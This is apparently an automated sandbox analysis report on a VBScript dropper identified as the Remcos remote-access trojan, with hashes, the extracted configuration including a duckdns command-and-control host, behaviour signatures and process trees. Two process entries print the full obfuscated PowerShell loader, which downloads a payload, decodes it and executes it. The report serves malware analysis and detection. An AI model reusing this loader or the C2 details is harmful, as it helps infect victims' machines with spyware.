Overview

overview

10

Static

static

1

9f4e20aa88...b0.vbs

windows7-x64

10

9f4e20aa88...b0.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-10-2024 06:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0.vbs

  • Size

    74KB

  • MD5

    cd9505a0c492be1e52f012f624835147

  • SHA1

    bece8abdda5efe16102c4c04d66cb1ab644b0046

  • SHA256

    9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0

  • SHA512

    b0ab14293923b2ca6a06a0c198b42c8f18d463a2e374e230d6a7f9c13afa49cf4c0c9c87b2c4a9687eb5f6ddf2b7644a1f500cf4077148aaa21a3f23effb00be

  • SSDEEP

    1536:sHyobezwnrkAkPh3JXNP3kK8A+NtZD8A/KtMNVAf:sHyMCAqhtKNtd8bf

Score
10/10
remcosremotehostdiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1916
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4216,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:8
    1⤵
      PID:4860
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
      1⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\syswow64\msiexec.exe"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2748

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize

      144B

      MD5

      06f6976c4bfd978a918660d3c9aaa776

      SHA1

      44d96ad55d7fa10f941237ccde79e301bd687893

      SHA256

      7ec29548888b5783d8ab2339f25db6eee7675144e1c7f4159a6758076692a1ba

      SHA512

      68fb1167f328d174ddd42ee25d944a0f04a3d1bd838f69f9f8117dbf09a2ef10c9a4dd2e461712a8db513376e52cd0fd900de20e2acb335bd134a0d5b98bf4d1

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      71444def27770d9071039d005d0323b7

      SHA1

      cef8654e95495786ac9347494f4417819373427e

      SHA256

      8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

      SHA512

      a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sopzjtgo.kre.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Maskes.lea
      Filesize

      461KB

      MD5

      ea499ea38a8e086008ff343b628809f6

      SHA1

      707ab355e7078bff7c196da77f4a5ff0c0ea2362

      SHA256

      b7a4595b962eaad033c02208443579a198a21fb2b97b0877a40f344debf840ac

      SHA512

      6dc431504913a8533d11bad6da2b4ee70879515c3ecd2ef42f2231b83c317018edf49d07c1bf154547ae42152ba016a3ef5a3a954288f6736450ed378d0eaa65

      Download Submit

    • memory/1916-16-0x00007FFA24EC0000-0x00007FFA25981000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1916-14-0x00007FFA24EC3000-0x00007FFA24EC5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1916-0-0x00007FFA24EC3000-0x00007FFA24EC5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1916-17-0x00007FFA24EC0000-0x00007FFA25981000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1916-18-0x00007FFA24EC0000-0x00007FFA25981000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1916-21-0x00007FFA24EC0000-0x00007FFA25981000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1916-12-0x00007FFA24EC0000-0x00007FFA25981000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1916-11-0x00007FFA24EC0000-0x00007FFA25981000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1916-6-0x000002903EC90000-0x000002903ECB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2748-60-0x00000000010F0000-0x0000000002344000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4500-26-0x0000000005BF0000-0x0000000005C56000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4500-36-0x0000000005DE0000-0x0000000006134000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4500-25-0x0000000005B10000-0x0000000005B76000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4500-38-0x00000000062F0000-0x000000000630E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4500-39-0x0000000006330000-0x000000000637C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4500-40-0x0000000007B10000-0x000000000818A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4500-41-0x00000000068B0000-0x00000000068CA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4500-42-0x0000000007550000-0x00000000075E6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4500-43-0x0000000007500000-0x0000000007522000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4500-44-0x0000000008740000-0x0000000008CE4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4500-24-0x0000000005A70000-0x0000000005A92000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4500-46-0x0000000008CF0000-0x000000000AEAA000-memory.dmp

      Filesize

      33.7MB

      Download

    • memory/4500-23-0x0000000005440000-0x0000000005A68000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4500-22-0x0000000004D20000-0x0000000004D56000-memory.dmp

      Filesize

      216KB

      Download